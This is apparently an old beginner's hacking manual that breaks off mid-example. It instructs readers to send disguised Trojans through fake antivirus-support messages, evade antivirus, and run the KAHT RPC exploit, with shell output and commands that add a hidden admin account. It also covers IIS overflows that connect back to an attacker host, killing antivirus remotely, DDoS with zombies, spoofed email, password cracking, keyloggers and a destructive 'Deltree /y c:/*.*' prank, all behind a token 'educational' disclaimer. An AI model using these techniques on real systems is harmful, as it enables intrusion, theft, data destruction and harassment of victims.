You are on page 1of 31

(Hacking is nothing but a “power of mind”)

By

*^@(((((((((( Muhammad Saqib The Power of Pakistan )))))))))


Welcome to Saqib, s World of

Hacking
A complete guide to beginners, those who want to learn how to utilize there Power of
mind in the challenging world. (Just for Pakistanis)

If you want help just e-mail me at:-

Saqibsworld1@yahoo.com

Or Contact at:-
Muhammad Saqib
Pakistan
(03455382062)

Read this First


Any content on this book take NO responsibility for
the way you use the information provided in this
book. The files references and anything else on this
book are here for educational purposes only and
SHOULD NOT BE read OR work according to
following information WHATSOEVER! If you are
affiliated with any government, or ANTI-Piracy
group or any other related group or were formally a
worker of one you CANNOT read this book, cannot
spread any of its page of information and you cannot
view any of the referred web link. All the objects on
this book are EDUCATIONAL PURPOSE ONLY
and are not meant for viewing or any other purposes
other then educational purpose for general people.

(This Book is only for Pakistanis)


Ten Things to Remember

1. Don’t try to use yours original name while hack to someone.


2. Never try to put yours original name or detail during the creation
of hacking file, software or virus.

3. Never change the hacked password of victims just read there


personal information don’t try to edit or add into there
information.

4. Don’t try to use those software to which you do not know “how
to use” them.

5. Don’t try to hack Bank accounts or website from yours home


place. Because they records yours IP address so, security
administrators can easily detect you.

6. The best way to secure you is to hide yours IP address or use


proxy to secure yours Ip Address.

7. Don’t create yours own hacking software but try to use someone
else (third party) software because it can require less experience
and prevents you from wastage of time. The important thing is
you should know the techniques I say it “How to hack” means
basic knowledge of hacking. And not on the software.

8. If you find that your created file is detected by antivirus software


then try to make them undetectable. It is very easy just add some
bytes to yours file which will be safe.

9. If you want to hack someone just make new e-mail address if


required. I suggest don’t use yours original information in new e-
mail address and you should make it any other place except home
place. Because when you opens Yahoo website they collect
complete information of yours computer without informing you.

10. Try to use dial-up connection because it is more secure as


compared to fixed connection.
Contents
1) FAQ - Frequently Asked Questions

2) Securing your Windows PC

3) Using a Trojan / RAT

4) Hacking a PC through NETBIOS shares

5) Hacking a PC with a exploit

6) Disconnecting someone from internet (DOS attack) - (Nuking)

7) Getting a PC name, MAC address and user name logged on

8) IP addresses, understanding it

9) IIS (Web server / Web page) hacking

10) Crashing WIN95/WIN98 PC with any access to share

11) Creating undeletable directories remotely

12) Connecting to mIRC through a Wingate

13) Anonymous email / Email as any address

14) Resetting and cracking Win2K or WinXP administrator password

15) Connecting to MIRC/KAZAA/ICQ through a firewall that has certain ports blocked
with a SOCKS server

16) Killing programs or processes remotely

17) Getting someone's IP and doing a ping sweep

18) Pranks to pull on someone

19) Cracking a user account locally or remotely - brute force or dictionary attack -
Win2K and WinXP

20) Accessing Routers


(1) FAQ - Frequently Asked Questions
How do I hack? - There is no easy way how to hack. Google is your best friend.
REMEMBER THAT! Read any information you can find on hacking. Read hacking
forums and check out hacking websites. Learn a programming language like C++. Get a
book like Saqib, sWorld of Hacking which will teach you a lot.

What do I need to be able to hack? - Firstly you need to understand how your computers
operating system works, networks and protocols works, security settings and general PC
knowledge. After you understand how it works you need hacking tools which helps you
to hack.

What is command prompt (cmd- the little dos Windows)? - Go START, RUN and type in:
"cmd" and then press enter command prompt of cmd windows will be in front of urs
screen.

What can I do in cmd? - You can do various things with it like run exploits or do a ping
request.

Why does some of the hacking tools I download just close itself when I open them? -
Lot's of hacking tools are DOS based and has to be run through CMD. If you double click
on the program it will open a DOS box and automatically close the box. From CMD you
can navigate to the directory which your hacking tool is stored in and run it from there.

What is a IP address? - Every computer connected to the Internet or some network has a
IP address. Go to START, RUN and type in "cmd" then type in "ipconfig" it will show
you your IP address or addresses. It will look something like this: 81.35.99.84.

IP = internet protocol. (Two systems cannot have same IP address)

How do I find someone's IP address? - Look further down in this book and use
IPSTEALER

What can I do with a IP? - Well you need someone's IP before you can hack, port scan or
DOS them.

What is IP ping? - It's a command you can use to check if someone's IP address is online,
to check it they connected to the Internet or a network. In command prompt type in "ping
192.168.0.21" - this will show you something like this:

Pinging 192.168.0.21 with 32 bytes of data:


Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.0.21:


Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

That means you can successfully PING IP 192.168.0.21 which means the IP is online. If
you get a message "request timed out" it means the IP is not online.

Bytes=32 is the amount of data which was sent to the host.

Time<1ms is the time the host took to reply.

Why can't I ping a certain IP? - Either the IP is not online/ in use or the person you’re
trying to ping is running a firewall which blocks ping requests or maybe your firewall is
blocking outgoing ping requests

What is 127.0.0.1 IP? - It is your PC's local IP address.

Why do I have two IP addresses when I do a ipconfig? - Well if you’re on a local LAN
(Local area network) you will have an IP like 192.168.0.1. If you’re also directly
connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1
Is your local IP which you use to communicate with your local internet network (LAN)
and 80.87.34.56 is your internet IP.

What is a static and dynamic IP address? - Static means permanent set IP address - like a
website will have a static IP address, it never changes. Dynamic means temporary IP
address - dialing up to the Internet with a modem or most ADSL connections has
dynamic IP's. Every time you logon to the Internet your ISP (Internet Service Provider)
will issue you a new IP address.

I have sent someone a Trojan but I cannot connect to their PC? - Either they are running a
firewall which blocks you from connecting to their PC, or they are connected to the
internet through a router.

What do I do when someone is behind a router and I want to control their PC with a
Trojan? - You will need to use a Trojan which uses reverse connections - meaning you
don't connect to the host, the host connects to you. Bifrost is a Trojan which has the
mentioned function. Remember when someone is behind a router and you’re using
IPstealer to get hold of their IP address, you are actually getting their routers IP, not their
actual PC's IP. The router will have the person’s internet IP (WAN IP) and their PC will
have a different IP - their LAN IP.
How do I check if my own PC is infected with a Trojan? - Do a port scan on your PC and
check which ports are open. If you find any open ports in this Trojan port list you might
be infected with a Trojan. Download the Trojan you think you might be infected with and
connect to that specified port.

What is a router? - A device which is used to route data on a network. A Router decides
where certain traffic should be sent to.

What is a firewall? - Its a software or hardware device which can block or permit certain
ports or IP's or certain kinds of data.

What is a port and what can I do with it? - Every program running on your PC which has
some network function uses a specific port to send and receive data though. If you do a
port scan you will see which ports are open on the host you scanned. Port 80 is normally
a web server. Port 21 a FTP server etc. Trojans also uses ports. Check this list of Trojan
ports, if you find an open port in this list, the host might be infected with a Trojan,
download the Trojan and try connecting to the port.

How do I do a port scan? - You need a program like superscan to do a portscan. Then all
you do is add the IP you want to scan.

Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you
which programs or services are running on the PC.

Common ports:

Ping : 7
Systat : 11
Time : 13
NetStat :
15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110

What is a exploit? - It's a poorly coded piece in software which you can use to gain access
to the system. There is many exploits available for the various MS Windows's out there.

How do I use a exploit? - You first need to compile the exploit with a program like
Bloodshed C++ compiler. Then you can start the exploit through command prompt and
see if the system you’re trying to exploit is vulnerable to that specific exploit. Scroll
down for more information about exploits.
What is a exploit POC? - POC stands for proof of concept and it the proof that an exploit
works.

What is a DOS attack? - It is when too much data is being sent to a host and it cannot
handle all the data and disconnects from the Internet.

How do I see what connections is currently made to my PC? - In cmd type in "NetStat" -
it will show you IP addresses of connections to your PC and what port it is using.

What is a MAC address? - Its a hard coded number, almost like a name which is
embedded into a network card. It identifies the manufacturer of the card and a unique
number for the card. No two network cards in the world have the same MAC address.

How do I find out my own or someone else's MAC address? -

Your own MAC = Go to cmd and type

e in "ipconfig /all"

MAC address looks something like this: 00-13-20-A3-0B-4C

Someone else's MAC address you need their IP address and then go to cmd and type in
"nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address
as well as their currently logged on user.

What is a Windows Registry and how do I access it? - Its where Windows stores most of
the configurations of your operating system and most programs installed. You might use
it to make a Trojan server file you uploaded to the PC run automatically when Windows
starts up. To access the registry go START, RUN and type in "regedit"

Carefully what you change in the registry, it might screw up you PC. First make a backup
of the registry.

How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC
download section on Windows Hacker. Remember not all web servers run IIS!

What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most web
servers run on port 80.

How do I check if a website is running on IIS? - Telnet to the website URL through CMD
- "telnet www.siteyouwanttocheck.com 80"

What is telnet? - Program which can be used to connect to remote computers or routers
and to run commands by simply typing them in its window.
How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then
someone discovers a way to get into those email servers, but the service provider fixes
the security hole so fast, there is no straight answer for that. Best way is to install a key
logger on the victims PC and get their login details. Otherwise download THIS program
like mps1.3 for yahoo or brute force which you can use to brute force a hotmail account.

How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use
to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the
POP3 password.

What is a key logger? - It is a program you install on someone's PC which captures every
key that is pressed on their keyboard which is emailed to you or stored into a file.

How do I get the administrator account password while logged in to the PC? - Locally
run a program like Adminhack for local administrator account cracking. If you need to do
it remotely run a program like Venom or Starbrute.

What is a SAM file? - SAM file is the file which stores all the user accounts and their
password hashes like the Administrator account. SAM file is stored in
"C:\WINDOWS\system32\config" but it is locked and inaccessible while you are busy
using Windows - meaning you can't copy it while you’re in Windows. You need to boot
up with another operating system like NTFSDOS or Linux with NTFS support. When
you copied the SAM file you can crack the passwords stored in the SAM file with a
program like LC5. With Pwdump6 it is possible to get access to the SAM file while
logged into windows. It can also connect to a remote PC and grab the password hashes
from the SAM file. Administrator account is needed.

How do I reset a administrator or some other account password on


Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor
which you can use to create a boot up disk or CD and then boot up the PC and then you
can reset the password. Just remember that this program will not show you the password,
you can only change the password.

How do I crack a administrator password? - If you need to crack a administrator


password you will need to copy the SAM file to another machine and crack it. Download
this NTXP-Cracker program which has included everything you need to boot up the PC,
copy the SAM file and crack the SAM file on another machine.

How do I find out what operating system does my target run? - Download Detect and use
it against your targets IP address. Result:

C:\>detect.exe 127.0.0.1
[*] ------------------------------ [*]
[*] XP/2K OS Detector [*]
[*] by: ill will & phr0stic [*]
[*]------------------------------[*]
[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1

[+] Bytes Sent: 222


[?] The box seems to be Windows XP

(2) Securing your Windows PC

Firstly install Win XP with the latest Service pack. Run Windows update (START, ALL
PROGRAMS, and WINDOWS UPDATE) and update Windows and all your device
drivers. Go download all the latest versions of applications you use like FTP server or
proxy or so, old versions of programs is insecure and you could be hacked that way.
Disable the "guest" account on your PC and rename your "administrator" account. Right
click My Computer and choose Manage. Stop any services you don't use, but be careful
not to stop something that u use (RIGHT CLICK MY COMPUTER, CHOOSE
MANAGE, SERVICES AND APPLICATIONS, and SERVICES). Stop the
MESSENGER and REMOTE REGISTERY services. Delete the admin shares, share it as
something else and then stop sharing it. Then when you reboot it will not share it
automatically again. With these admin shares domain admen’s and hackers can access
your PC. Make sure to put a complex password on all your accounts. Make your hard
drive NTFS - it is the file system you format your hard drive with. Put a password on
your BIOS and make sure you change the boot order to boot first with the hard drive, so
someone cannot boot up with a CD, delete your SAM file, or crack its password and gain
administrator access to your PC. Make sure the built in firewall is enabled. Check in
control panel for Windows firewall. This firewall may be the cause that some of your
hacking applications and tools will stop working, so if you have a problem with an
application make sure to add this program to your windows firewall exceptions. Install
some kind of anti virus program, Norton Anti Virus works good, but remember that a lot
of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running
those tools. Also install a Spyware removal tools like Spyware DoctorSpyware is
irritating software which is installed onto your PC through files you download from the
net or WebPages you open which has malicious code in it. It slows down your PC and
might send your information to the Spyware creator.
(3) Using a Trojan / RAT
Trojans is one of the first things you must learn when you want to hack. A Trojan is a
small program you send to someone to infect their PC so you can control their PC, steal
passwords, files or just have some fun. Every Trojan works on a different port, like Sub7,
works on port 27374. If you scan a PC and find that port 27374 is open, it means the
machine is infected with Sub7. Now of course the Trojan can be set with a password, it’s
up to you to crack it then. Now remember that most Trojans are picked up by Anti Virus
software. You need a new released Trojan which AV does not pick up.

The Trojan most people know is Sub7. Before you can start using the Trojan, you first
need a host to infected with a Trojan. A host can be infected in a lot of ways. You can
send the host the Trojan server file, and tell them it's a game or a firewall or whatever you
like it to be. Best is to rename the file to something they will think is useful like:
WindowsXP_update.exe. You can email them this file or put it on a downloads area on a
web page, use your imagination. My Favorite way is to send people a "net send" message
with MSMH and choose a name like NortonAntivirust_Support and tell them their PC
was detected with a virus, please go to
www.yourpagewithtrojanfile.com/Virus_Cleaner_V1.20.exe and run the file to remove
the virus from their PC. Net send only works on NT4 and Win2k and Win XP machines
that's got messenger service enabled. Disable your messenger service; you do not want
people sending you stupid messages. You can also bind the Trojan file with another file,
any executable file the Trojan can be binded to. Always remember to rename the file,
change the program icon and the put a password on the server file. Bind the file with
another file and set the file to automatically delete itself after executed, or set it to give an
system error.

When you infect a host or find a infected host, it's time to connect. Easy way to find
Trojans infect hosts is with Trojan hunter. Choose an IP range to scan through and it will
search for Trojan infected hosts. When you found an infected host, download the Trojan
client from my Trojans page. Connect with the Trojan to the host IP, to the certain port
the Trojan works on and you are ready to take control. Each Trojan uses a diffident port.
Here is a list of ports which a certain Trojan works on.

With most Trojans, you will be able to log keystrokes on a PC, even get logged into a file,
and when the host is online it will email the keystrokes to an specified email address.
Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse.
With Sub7 you can do anything on the infected host, just as if you where sitting in front
of the PC itself.
Important things are remember. A Trojan comes with a file called "server.exe". Never run
that file on your own PC, it will infect your PC with the Trojan! Use the Trojans
configuration file to make changes to the "server.exe" file and then send the file to a
victim.

There is also Trojans which has the option to do a reverse connection. Very useful if the
person sits behind a router or firewall. After your infected the victims PC, the Trojan will
automatically connects to you, thus getting past the problem of connecting through a
router or firewall. Remember that if you do not connect to the Internet directly (with a
modem) and you sit behind a router, you will need to forward the Trojan ports in your
routers configuration if you are doing a reverse connection.

Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, useful when
the host is behind a router.

(4) Hacking a PC through NetBIOS shares

Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP
range and use Netscan to search through the IP range for PCs with shares. A PC can only
have shares if it is connected to a network or has file and printing enabled, so mostly
computers with an network card. If you find a computer with a share, use Windows to
connect to that share. Go START, RUN and type in "\\IP\sharename". Example
"\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the
share, to delete, copy or rename files or directories, depending what it was shared as, but
most people share things with full access and no password. If you find a PC with shares,
but when you try and connect to it, it ask you a password, the easy way to crack it is with
PQWak, this program brute force cracks the password for you - Win9X only. Windows
NT/XP, works through permissions, so if something is shared, it is shared with
permissions to the folder, and permissions is given to an user name. But a lot of people
make shares with full access to anyone. Win2K/XP accessing an share like the C$ share
will ask you an username and password, if there is no password specified by the person
who's PC it is. Trying username as Administrator and password blank. Most people got
administrator account password blank, easy way to get onto their shares. Windows 2000
and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a Trojan server file into their startup
folder, and then when they reboot their PC, the Trojan will run and you will have access
to their PC with the Trojan.
(5) Hacking a PC with a exploit
What is a exploit? It's a poorly coded piece in software which you can use to gain access
to the system. There is many exploits available for the various MS Windows's out there.
Check this page for new exploits: http://www.frsirt.com/exploits/Now if you’re a n00b,
you don't know how to compile an exploit, basically you need some programming
experience, so go learn how to program. Most exploits are written in C++ so try
Bloodshed Dev C++ which you can use to compile exploits. Read this tutorial about
compiling exploits. But you can download exploits which other people has already
compiled. If someone updates their PC when new exploits comes out, you can't exploit
them. But if they don't update and install new patches, the chance you can exploit and
gain access to their PC is big. Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is an exploit for Win2k/XP and it’s already compiled, you can download it by
searching on goolge. This is an explanation of how to use it:

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool (make sure to deactivate your AV)

3. Run exploit from cmd

C :\> kaht 192.168.1.100 192.168.1.101

Note: 192.168.1.101 is the target

192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below

------------------------------------------------------------------------

KAHT II - MASSIVE RPC EXPLOIT

DCOM RPC exploits, Modified by At4r@wdesign.es


#haxorxitos && #localhost @efnet Ownz you!!!

Full VERSION AUTOHACKING

-------------------------------------------------------------------------

Targets: 192.168.1.100-192.168.1.101 eith 50 Threads

Attacking Port. Remote Shell At ports: 36388

Scan in Progress....

- Connecting to 192.168.1.101

Sending Exploit to a [win2k] Server....

- Connect and con la shell Remote...

Microsoft Windows 2000 [Version 5.00.2195]

<C> Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW. YOU ARE IN TARGET DRIVE

6. Then you may add user

C:\WINNT\system32>net user myuser mypassword /add

^^

User name password

7. Group to admin

C:\WINNT\system32>net local group Administrators myuser /add

^^^

Target group group user


8. Sharing drive

C:\WINNT\system32>net share c=c:

9. Exit from target. Don’t forget!

C:\WINNT\system32>exit

10. Use share drive, run cmd

C:\>net use * \\192.168.1.101\drive_c * /u: myuser

Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.

(6) Disconnecting someone from internet


(DOS attack) - (Nuking)

Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95.
It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still
use Windows 95 and NT4, but not a lot of people. If you find someone by any chance,
use Superkod. I found it works best. Open up the program, type in the IP and Click
NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet
connection will be dropped or they will get a BSOD.

That's all very well and all, but with a program like KOD, it does not hide your IP from
your attacker. If they are running a firewall, they will see where all this traffic is coming
from and they will see it's YOU. So now, you need to spoof your IP address so the
attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend
using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not
spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a
broadcast list, a list it uses for address to spoof from. So if you attack someone, they will
see IP's attacking them that do not exist. Before you attack someone, find out what
connections he has, because if he wants to attack him with bandwidth, you will need
more than him. So if it is an modem user with no firewall, you will be able to disconnect
him yourself. If it is someone with more bandwidth than you, a firewall or a patched
system, you will need BANDWITH to disconnect him. So gather around a few of your
buddies, give them a DOS tool and all of you guys at the same time attack him. Make
sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming
connections if they start attacking back. Heck even better, infect a few hosts on a ADSL
line or a corporate line with a lot of bandwidth, and take down microsoft.com. This is the
part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a
DOS attack on someone. It works almost like a trojan which you infect their PC and take
control of it.

Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.
Also try DOS 3 from the DDOS section, it’s a very cool application and there is an
detailed explanation, it also supports spoofing.

(7) Getting a PC name, MAC address and


user name logged on

So you would like to know someone's PC name, or their MAC address of their network
card or the username that currently logged onto the PC? It can be very useful to have this
info on someone. Their PC name can be their own name or company name. Their MAC
address is the address of their network card, which is static, means that it can never
change. Their username can also be useful if you would like to know this persons name.
All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in “nbtstat -a IP"


EXAMPLE: nbstat -a 196.35.24.15, it will show something like this:

Local Area Connection 3:

Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status

PCNAME <00> UNIQUE Registered

DOMAINNAME <00> GROUP Registered

PCNAME <03> UNIQUE Registered

PCNAME <20> UNIQUE Registered

DOMAINNAME <1E> GROUP Registered

USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, domain name if it is connected to a domain and it will
show the user name logged onto the PC. The MAC is static, meaning it never changes,
useful for identifying someone. Your buddy attacks you, you check his IP and you do a
"nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see
he has got the same MAC address you know it was him attacking you.

(8) IP addresses, understanding it

Everyone that connects to an network has got a IP address. An IP address looks


something like this: 80.65.123.252 your network card has an IP and your modem has an
IP address if you connect to the Internet, but both are diffident because your LAN is not
part of the internet. When you connect to Internet, depending on your connection, you get
a fixed (static) IP or a dynamic IP. Modem users get a IP address that changed every time
they reconnect to internet, Very useful if you attack people, so if you disconnect, then you
get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you
will get a static IP, so whenever you connect to internet you get the same IP every time.
Attack someone without IP spoofing; they will be able to see it is your IP attacking them!
They can then go to your ISP (internet service provider), check who does this IP belong
to and you can get into trouble. This is where modem users are lucky; they don't have a
static IP and then can go mad and attack people and so without being caught, well
almost... Their ISP can still check who was using the certain IP for a certain time and
what telephone number it was coming from, but it’s too much of a hassle for a simple
DOS attack.

IP spoofing is basically when you attack someone and you use a bogus IP. A DOS attack
or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's
that does not really exist, or it does exist but it is someone else's IP, not yours. Every
network cards has a burned in MAC address. a MAC address looks something like this :
00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and
they do a nbtstat on you, get your MAC address of your network card, it is a simple way
of identifying you as the attacker.

(9) IIS (Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS
server is actually very easy. A lot of system administrators does not load patches on their
IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will
show u to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there is still a
lot of IIS4/5 servers online. The way IIS server is being hacked is though buffer
overflows and exploits. This is when a certain code is sent to the server; the server gets
confused and grants you root access to the server. There is a lot of IIS hacking tools
making it easy for anyone to hack an IIS server. Not all web servers are run on IIS; there
is many other web server software out there like Apache. We will only be dealing with
IIS servers.
Firstly you have to find a IIS server. Dreamscape IIS scanner is very useful. It gives you
the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS
servers, and which version the host is running. Another way is to telnet to the IP on port
80. In dos prompt (Start, Run, and CMD) type in: telnet 196.35.45.21 80. It will open
telnet and show you what IIS the host is running. Web servers normally run on port 80,
but it can be any other specified port. If you find an IIS server, it's time to DEFACE it :)
We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt
(Start, Run) run jill-win32. It will show you this:

Iis5 remote .printer overflows.

Dark spyrit <dspyrit@beavuh.org> / beavuh labs.

Usage: jill-win32 <victim Host> <victim Port> <attacker Host> <attacker Port>

An example how to use it:

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to


deface, port 80 is the port the server runs it IIS service on, 196.89.65.45 is your IP, and
port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-
win32 it will exploit a printer overflow on the IIS server and create a backdoor on the
server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a better explanation:

Download IIS Hack and do the following:

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80


6969

IIS Hack Version 1.5

eEye Digital Security

http://www.eEye.com

Code By: Ryan Permeh & Marc Maiffret

eEye Digital Security takes no responsibility for use of this code.

It is for educational purposes only.

Attempting to find an executable directory...


Trying directory [scripts]

Executable directory found. [scripts]

Path to executable directory is [C:\Inetpub\scripts]

Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.

Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe

Sending the exploit...

Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should
get a cmd prompt.

C :\> telnet www.[yourowncompany].com 6969

Trying www.[yourowncompany].com...

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami

(10) Crashing Win95/Win98 PC with any


access to a share

Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC
can be crashed with this /con/con exploit, but you need access to a share on the PC, any
access will work.

Create a html file with the following code in it:

<Html>

<Head><title>Crash! </title></head>
<Body>

<a href="file://pcname/share name/con/con">click me! </a>

</body>

</html>

The pcname is the Pcname of the PC you want to crash (or the IP) and the share name is
the share you got access to. When you open the htm file and click on the link, it will crash
(BSOD) the PC.

(11) Creating undeletable directories


remotely

Now this is something that can really create havoc!!! I tested it on Win9X and Win
NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows
9x and NT 4 has a flaw which allows an remote connection to create undeletable, well
practically undeletable files and directories to be created anywhere on a remote machine.
These files and directories can be deleted, but it takes about 2 minutes to delete through
dos commands. Download NetBIOS Bomber, choose the target and choose which OS and
you ready to makes someone's life hell. Remember if their system is update it will not
work.

(12) Connecting to mIRC through a


Wingate
A Wingate is like a proxy server, anyone can connect to the server (some do have
usernames and passwords), and then work through the server to connect to some other
server. Then it will look like you are working form that server, your identity changed.
MIRC is an internet relay chat client, a chat room client. Download mIRC now!! In
mIRC there is a firewall option, this is where you specify your Wingate server. Click the
"use firewall" option; make sure its set to socks 4! And put in a Wingate address in the
"hostname". Port should be 1080 with no username or password. Wingate list available
from Cyber army or you can use any port scanner, or you can use Proxy finder to search
for socks Wingate on a subnet. Scan any IP range for hosts that have got port 1080 open.
Wingate’s are great for IRC to keep you anonymous.

(13) Anonymous email / Email as any


address

Download RA-Anonymous email first. Then choose who u want to send to and from who
u want the email to be from. For this to work you will have to find an SMTP server that
accepts relaying. . So in the server space put in: "smtp.mweb.co.za" - this SMTP worked
at the time I tested it. And your are ready to send someone email from
billgates@microsoft.com!! :) Use OPENRELAYCHECKER by searching at
http://www.google.com download OPENRELAYCHECKER which you can use to search
for email servers that support relaying.

(14) Resetting and cracking Win2K or


WinXP administrator password

Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or
CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete
that file and reboot machine. Now the Administrator account password will be reset to
blank (no password). Only works with FAT32 partitions. For Windows XP need this file
which has a few utilities you can use to reset the XP administrator password. Then there
is also a program called Adminhack which you load in a dictionary file to crack the
administrator account if you have local access on the PC.
(15) Connecting to MIRC/KAZAA/ICQ through a
firewall that has certain ports blocked with a SOCKS
server

When you behind a firewall and MIRC, Kazaa or ICQ are blocked you can use a
technique called http tunneling. Basically your program to an program running on your
computer and the programs redirects the data thru HTTP. Download HTTPORT or
SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect
MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the
firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS
server. Server address is 127.0.0.1 - your local IP and socks port is port 1080.

(16) Killing programs or processes


remotely

Let’s say you try and upload a trojan to someone's machine and their anti virus picks it
up. Check if you can get a account on the machine with Administrator rights. If you have
an account like that, you can use PSKILL and kill the anti virus program or firewall. You
can basically kill any program or process running on the machine, but it must be a Win2k
or XP machine. If the person is running Norton anti virus the file will be something like
nav32.exe. Now with pskill the command will be :

pskill \\66.33.22.11 -u administrator nav32.exe

66.33.22.11 is the IP or pc name of the victim

-u administrator is the account you have admin rights to


Nav32.exe is the program file name or process you want to kill. You can use
winlogon.exe even and it will most probably give a blue screen after you killed that
process. So now you killed the anti virus or firewall and now you are ready to upload a
trojan or key logger or anything you like...

(17) Getting someone's IP and doing a


ping sweep
Download IPstealer from searching at http:\\google.com and put in your IP, then click on
Convert IP, Click on Listen and send your victim the Link to use. When they open that
link it will show up in IPstealer.If you need random IP addresses you can do a ping
sweep. It scans a whole IP range and shows you which IP's are online. Download
Superscan and put in a IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping
only" under scan type. It will scan the whole IP range and show you which IP's are
online.

(18) Pranks to pull on someone

Here is a few things u can do to someone to annoy the living hell out of them :)

1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it
contains the following (Win9X only)

C:\Aux\Aux

or

C:\Con\Con

Now place this in the C:\Windows\Start Menu\Programs\Startup folder, so when the pc


reboots it will throw out a BSOD every time it starts up.

2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*
3) Make a screen shot of the persons desktop. put that picture as their background and
hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the
windows out of the way, just check how clever your friend really are. Or put a password
one a screen saver and put the screen saver file into the startup folder. They will have to
boot up into save mode to restore the screen saver.

4) A nice harmless trick, schedule something like a screen saver with a password on a PC
for a certain time, sure to make someone scream.

5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line
with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON
IT. When the PC gets restarted it will come up with that message and it will not boot up
@ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates
Hates You" :)

(19) Cracking a user account locally and remotely - brute force or dictionary attack -
Win2K and WinXP

When you need the password of a account on your local machine or on a remote machine
you can either brute force or dictionary attack the account. Remember this could take
from 1 minute to a few days depending on how complex the password is.

------------------------------------------------------------------------------------------------------

First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a
dictionary attack while logged onto the machine locally.. You will need a wordlist which
Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility

Copyright (C) 2005-2006 Pranay Kanwar <warl0ck@metaeye.org>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.

[+] Trying 77012 words from wordlist.txt for 'guest'


[+] Done 21%.

[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account you’re trying to crack

-f is the name of the wordlist you will be using

Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be
used to crack a user account on a remote PC. Starbrute uses brute force to guess the
password. Meaning it will use Charset: 1234567890abcdefghijklmnopqrstuvwxyz in
random order to guess the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute 192.168.0.3 guest 3 4 high

════════ Starsky32 IPC brute force ════════

▓ Target IP: 192.168.0.3

▓ User Account: guest

